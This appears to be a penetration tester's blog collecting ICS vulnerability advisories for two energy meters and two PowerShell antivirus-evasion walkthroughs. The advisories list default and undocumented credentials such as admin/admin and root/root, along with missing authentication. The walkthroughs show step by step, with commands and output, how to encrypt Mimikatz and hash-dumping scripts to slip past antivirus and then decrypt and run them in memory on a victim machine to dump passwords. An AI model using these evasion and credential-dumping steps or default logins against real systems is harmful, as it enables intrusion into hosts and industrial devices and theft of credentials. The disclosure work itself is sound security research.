Wednesday, February 22, 2017

[ICS] Carlo Gavazzi VMUC-EM Energy Meter - Multiple Vulnerabilities


ICS-CERT Advisory


Vulnerable versions

  • VMU-C EM prior to firmware Version A11_U05, and
  • VMU-C PV prior to firmware Version A17

VMU-C Web-Server solution for photovoltaic applications

VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers.

VMU-C EM is a modular system that records, monitors and transmits analog and digital signals from an industrial, commercial or residential installation with a specific focus on energy efficiency. The system includes a web server with a powerful and intuitive user interface to monitor data and set up the system. Data can be transmitted using various protocols (FTP, HTTP, Modbus TCP/IP) and via wired or wireless connection.

VMU-C EM Features:
  • Data logger for energy meters, environmental sensors and rate pulses
  • Web server function & data transfer (FTP, HTTP, Modbus/TCP slave)
  • RS-485 and Ethernet communication with meters
  • USB ports for communication and backup
  • Micro SD card port for data backup
  • Data management of electrical variables from up to 32 energy meters
  • Support for most Carlo Gavazzi meters
  • Support for non-Carlo Gavazzi meters with open Modbus tool
  • Option for up to 33 dual I/O modules
  • Option for up to 11 analog, 22 temperature and 11 pulse rate inputs
  • cUL listed product

1. Weak Credentials Management
-> Default credentials: admin/admin
-> Application does not enforce a mandatory password change after first login

2. Sensitive Information stored in clear-text
Accounts menu option
⇒ shows username and password
⇒ passwords shown in clear-text
⇒ SMTP server password
⇒ user and service passwords are stored in clear-text

3. Access Control flaws
  1. Access control is not enforced correctly
  2. Certain application functions can be accessed without any authentication
  3. Application stores the Energy / Plant data in an SQLite database, EWPlant.db. Anyone can download the plant database file without any authentication

4. Reflected + Stored XSS - multiple URLs and parameters -> not documented in the ICS-CERT advisory

5. Vulnerable to Cross-Site Request Forgery

No CSRF token is generated per page or per sensitive function, so the device cannot distinguish a request the user intended from one forged by another site. Successful exploitation allows silent execution of unauthorized actions on the device, such as changing configuration parameters and saving the modified configuration, whenever a logged-in user visits an attacker-controlled page.


Friday, December 30, 2016

[Video] Threat Actor Techniques

Presented by Jeremy Junginger at FIRST security conference 2014

This demo presents a realistic attack scenario exhibiting some of the methods and techniques used by threat actors to compromise an internal network, from the Internet.
XSS - Restricted shell - Privileged shell - Hashes - Domain PWN - Network Attacks - Game Over!


Wednesday, October 19, 2016

New Powershell Mass Encrypt and Decrypt modules


These scripts are wrappers around PowerSploit's Out-EncryptedScript.ps1.

Out-EncryptedScript.ps1 encrypts one script at a time, and the encrypted file then has to be decrypted manually before it can be executed.

Using PS-MassEncScript.ps1, encrypt multiple scripts with a password and a salt value, in one go.

Move the encrypted files over to the target / compromised box. Because what sits on disk is ciphertext, file-based AV / IPS signatures do not match it - at least as of now.

Use PS-DecScript.ps1 to decrypt & execute any of these encrypted files.

See the example script runs below:

On Attacker's box

C:\ps_stuff>dir *.ps1
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff

10/19/2016  06:51 AM             4,850 Out-EncryptedScript.ps1
10/06/2016  04:42 AM             1,663 PS-DecScript.ps1
10/19/2016  01:56 AM             3,267 PS-MassEncScript.ps1
               3 File(s)          9,780 bytes
               0 Dir(s)  45,774,680,064 bytes free

C:\ps_stuff>dir scripts            <--- directory where all scripts to be encrypted are stored
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff\scripts

10/19/2016  07:07 AM    <DIR>          .
10/19/2016  07:07 AM    <DIR>          ..
09/09/2016  12:06 PM             8,863 Get-LSASecret.ps1
09/09/2016  11:46 AM            14,948 Get-PassHashes.ps1
09/09/2016  11:38 AM         1,271,440 Invoke-Mimikatz.ps1
               3 File(s)      1,295,251 bytes
               2 Dir(s)  45,776,424,960 bytes free


Normally an AV will immediately flag these scripts, quarantine them and / or block their execution.

Encrypt these scripts using PS-MassEncScript.

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\ps_stuff> 

Step 1 -> Import PS-MassEncScript.ps1
PS C:\ps_stuff> Import-Module C:\ps_stuff\PS-MassEncScript.ps1

Step 2 -> Execute PS-MassEncScript.ps1 with 4 parameters
PS C:\ps_stuff> PS-MassEncScript C:\ps_stuff\Out-EncryptedScript.ps1 C:\ps_stuff\scripts password salt

argument 1 -> C:\ps_stuff\Out-EncryptedScript.ps1 -> path to Out-EncryptedScript.ps1
argument 2 -> C:\ps_stuff\scripts -> path to scripts that you want to encrypt
argument 3 -> password
argument 4 -> salt

PS C:\ps_stuff> dir .\scripts

    Directory: C:\ps_stuff\scripts

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          9/9/2016  12:06 PM       8863 Get-LSASecret.ps1
-a---        10/19/2016   7:10 AM      12809 Get-LSASecret_evil.ps1
-a---          9/9/2016  11:46 AM      14948 Get-PassHashes.ps1
-a---        10/19/2016   7:10 AM      20925 Get-PassHashes_evil.ps1
-a---          9/9/2016  11:38 AM    1271440 Invoke-Mimikatz.ps1
-a---        10/19/2016   7:10 AM    1696253 Invoke-Mimikatz_evil.ps1

PS C:\ps_stuff>

As seen above, each encrypted script is written next to its original with a _evil suffix.

On the victim box:

Assuming you already have shell access, move the encrypted files to the victim box.

.\PS-DecScript.ps1 <evil script name> password salt 'Command passed to the decrypted script'

PS C:\victim> .\PS-DecScript.ps1 .\Invoke-Mimikatz_evil.ps1 password salt 'Invoke-Mimikatz -DumpCreds'
Executing .\Invoke-Mimikatz_evil.ps1

  .#####.   mimikatz 2.1 (x86) built on Feb 21 2016 18:42:23
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( )
 '## v ##'             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 117741 (00000000:0001cbed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : win7ent-01-lab
Logon Server      : WIN7ENT-01-LAB
Logon Time        : 10/19/2016 6:47:25 AM
SID               : S-1-5-21-3784992239-1999550448-2462781864-500
        msv :

PS C:\victim> .\PS-DecScript.ps1 .\Get-PassHashes_evil.ps1 password salt 'Get-
Executing .\Get-PassHashes_evil.ps1
<hash dump>

PS C:\victim>


Thursday, September 15, 2016

[ICS] BINOM3 Electric Power Quality Meter - Multiple Vulnerabilities

[ICS] Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple Vulnerabilities


The meters are designed for autonomous operation in automated systems: 
• SCADA systems
• Data acquisition and transmission systems
• Automated data and measurement systems for revenue and technical power metering 
• Power quality monitoring and control systems
• Automated process control systems, Management information system

Submitted to ICS-CERT - May 25, 2016
ICS-CERT Advisory published Jan 2017
Vulnerability Information

Web Management Portal

1. Reflected XSS – multiple urls, parameters
Successful exploitation could allow an attacker, authenticated or not, to inject arbitrary JavaScript through a specially crafted URL, because user-supplied data is returned in the response without being encoded for safe display.

2. Stored XSS – multiple urls, parameters
Successful exploitation could allow an authenticated attacker to inject arbitrary JavaScript into specific input fields; the input is stored in the underlying db and, when the page is later viewed, returned to the browser unencoded, leading to script execution.

3. Weak Credentials Management 
The device comes configured with four (4) login accounts:
- admin / 1 
- user / 1 
- alg / 1 
- telem / 1

- These passwords do not meet even basic security criteria.
- Making it easier still for an attacker, the application gives users no option to change their own passwords in the device management portal; only 'root' can change the passwords of the other accounts (AFAIK).

4. Undocumented root account 
In addition to the above four documented login accounts, there is a 'root' superuser account:
- root / root
- root account details are not documented in the device administration guide or manuals
- root account has multiple, additional functions accessible like user management

5. Sensitive Information stored in clear-text 
Sensitive information, specifically, the account passwords, are all stored and shown in clear-text.

Additionally, certain non-root, non-privileged users can download the complete device configuration file, which contains clear-text passwords and other configuration data. This flaw can be used to gain privileged access to the device.

6. Vulnerable to Cross-Site Request Forgery 

No CSRF token is generated per page or per sensitive function, so the device cannot distinguish a request the user intended from one forged by another site. Successful exploitation allows silent execution of unauthorized actions on the device, such as changing configuration parameters and saving the modified configuration, whenever a logged-in user visits an attacker-controlled page.

7. Sensitive information leakage

Every time 'root' logs in, the browser issues a GET request to a specific url that returns the password configuration file.

The response is xml and contains every account together with its password. Since the management portal uses plain HTTP by default, a suitably positioned attacker can sniff all login credentials off the wire and gain privileged access.


8. Access Control Flaws
By default, password authentication is not enabled on Telnet access (AFAIK).
- This access gives superuser-level access to the device
- It provides detailed information on the application, configuration, device file system, databases (including Energy & billing), consumption, statistics and network settings, as well as clear-text creds (FTP)
- An easy vector to device & data compromise
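The Telnet finding above is the kind of default worth verifying from the network rather than trusting the manual. The following is an added example written for this page (my own, not the advisory's and not the vendor's): it connects to a Telnet port, refuses every option the server tries to negotiate so the server proceeds to its banner, collects whatever the server sends unsolicited within a timeout, and reports whether that text looks like a credential prompt. The target address, port and the prompt pattern are assumptions to adjust; nothing BINOM3-specific is assumed, and a shell prompt that simply lacks the word 'login' still needs a human to confirm.

```powershell
# Added example, not from the advisory or the vendor. Checks whether a Telnet service
# asks for credentials or drops straight to a prompt. Sends only option refusals.
function Test-TelnetAuthPrompt {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$true)][string]$ComputerName,   # device address (assumption: yours)
        [int]$Port = 23,
        [int]$TimeoutMs = 3000
    )
    # Telnet protocol bytes (RFC 854)
    $IAC = 255; $DONT = 254; $DO = 253; $WONT = 252; $WILL = 251; $SB = 250; $SE = 240

    $client = New-Object System.Net.Sockets.TcpClient
    $client.Connect($ComputerName, $Port)
    $stream = $client.GetStream()
    $stream.ReadTimeout = $TimeoutMs
    $buf  = New-Object byte[] 4096
    $text = New-Object System.Text.StringBuilder
    $deadline = (Get-Date).AddMilliseconds($TimeoutMs * 2)   # cap total wait even if the server keeps talking

    try {
        while ((Get-Date) -lt $deadline) {
            # A read timeout surfaces as IOException: the server has gone quiet, we are done.
            try { $n = $stream.Read($buf, 0, $buf.Length) } catch [System.IO.IOException] { break }
            if ($n -le 0) { break }
            $i = 0
            while ($i -lt $n) {
                $b = $buf[$i]
                if ($b -ne $IAC) { [void]$text.Append([char]$b); $i++; continue }
                if (($i + 1) -ge $n) { break }   # IAC split across reads: ignore the fragment
                $cmd = $buf[$i + 1]
                if ($cmd -eq $IAC) { [void]$text.Append([char]255); $i += 2; continue }  # escaped 0xFF
                if ($cmd -eq $SB) {
                    # Skip subnegotiation up to IAC SE.
                    $i += 2
                    while (($i + 1) -lt $n -and -not ($buf[$i] -eq $IAC -and $buf[$i + 1] -eq $SE)) { $i++ }
                    $i += 2; continue
                }
                if (($cmd -eq $DO -or $cmd -eq $WILL) -and ($i + 2) -lt $n) {
                    # Refuse every option: DO x -> WONT x, WILL x -> DONT x.
                    $reply = if ($cmd -eq $DO) { $WONT } else { $DONT }
                    $stream.Write([byte[]]@($IAC, $reply, $buf[$i + 2]), 0, 3)
                    $i += 3; continue
                }
                # DONT/WONT carry an option byte (3 bytes); NOP, GA and friends are 2 bytes.
                if ($cmd -ge $WILL -and $cmd -le $DONT) { $i += 3 } else { $i += 2 }
            }
        }
    } finally { $client.Close() }

    $banner = $text.ToString()
    New-Object PSObject -Property @{
        Target          = "$ComputerName`:$Port"
        Banner          = $banner
        # Heuristic only: adjust the pattern for the device's own prompt wording.
        AsksCredentials = [bool]($banner -match '(?i)login|user ?name|password')
    }
}

# Usage (address is a placeholder):
#   Test-TelnetAuthPrompt -ComputerName 192.0.2.10 | Format-List
```

Read the Banner field, not just the boolean: a device that prints a menu or a command prompt with no credential request is the finding described above, while an empty banner usually means the service waits for a keystroke before prompting, which this check deliberately does not send.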


Saturday, September 10, 2016

[Quick Notes] Powersploit - AV Evasion


On my pentest engagements, I primarily use Powershell (PS) & PS based exploitation tools & frameworks like CME, Empire, Powersploit, Nishang, Veil, etc, along with Metasploit & other tools.

This short writeup is one of the AV evasion scenarios. Posting here for reference.

The objective is to dump hashes and clear-text passwords from memory with Mimikatz. Any decent anti-virus blocks attempts to read, modify or execute Invoke-Mimikatz.ps1.

Enter PowerSploit's Out-EncryptedScript.ps1. Use it to encrypt any malicious file (text or ps1) offline on the attacker's box, then upload the encrypted file to the target. The script takes a password and a salt to encrypt the file.

Out-EncryptedScript will encrypt a script (or any text file for that matter) and output the result as a minimally obfuscated script, evil.ps1 by default.
Out-EncryptedScript .\Invoke-Mimikatz.ps1 password salty

A new, encrypted ps script - evil.ps1 - is generated.

Read the encrypted file, define its decrypt function, decrypt the payload in memory and execute it:
[String] $cmd = Get-Content .\evil.ps1
Invoke-Expression $cmd
$decrypted = de password salty
iex $decrypted; Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz.ps1 executes successfully.



The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.